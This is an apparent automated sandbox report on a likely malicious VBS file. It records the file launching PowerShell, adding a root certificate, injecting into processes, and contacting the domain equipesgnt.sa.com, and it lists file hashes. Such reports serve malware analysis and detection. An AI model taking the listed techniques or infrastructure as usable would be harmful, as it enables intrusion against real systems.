Analysis Overview
SHA256
b5fc757f3a9354b1220ad605164cdc1aa2898020a845201b38a0badc14fbfe13
Threat Level: Likely malicious
The file 10062024_1322_09062024_033MSOG241591GHD.out.gz was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-10 13:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-10 13:22
Reported
2024-06-10 13:25
Platform
win7-20240221-en
Max time kernel
133s
Max time network
134s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = (binary blob omitted) | C:\Windows\System32\WScript.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\033MSOG241591GHD.out.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stillelegs.ulv && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stillelegs.ulv && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | equipesgnt.sa.com | udp |
| DE | 84.247.168.16:80 | equipesgnt.sa.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab173A.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar174D.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UWS44I1WDHBX8K8NAUDI.temp
| MD5 | 7ea4a9172269349a3a2250b1902546e6 |
| SHA1 | 922c2c68e79cebe9f439e0a3bd009b7246586d75 |
| SHA256 | 2fa2c0169df37cadf671efb842e5c13c860930cf001078ddd26eebb7dcf9275a |
| SHA512 | d33c91d33a953fc26459532e98f12b76d65e4527046ec9d302dc4fbddd327cbf60e39803a2bf4b3d3c2126a46f907416bd23c60a3ee1d37bcaa0103fa2cb52f3 |
C:\Users\Admin\AppData\Roaming\Stillelegs.ulv
| MD5 | 55637e3c8b1599767fc3678c12d4f158 |
| SHA1 | 01757599794dcd1f72dbb7cdde2f1d77dc643d6c |
| SHA256 | 1c159d03f6942cb5d49ba980c88c10a4f88eeca751211f644ffa6f376edbbe85 |
| SHA512 | 7f8d9149ab9ceb23913372a44205cb1615f6f3a9457940a6e6cd7e45e8c1b0e7fff5ec3cc6da2ffb07d0ac8f80d3f77a65693d6079b5ab8843f4f038e400c633 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-10 13:22
Reported
2024-06-10 13:25
Platform
win10v2004-20240508-en
Max time kernel
146s
Max time network
144s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4452 wrote to memory of 1468 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1468 wrote to memory of 4164 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\033MSOG241591GHD.out.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stillelegs.ulv && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | equipesgnt.sa.com | udp |
| NL | 52.111.243.29:443 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a3qexmpg.1qj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |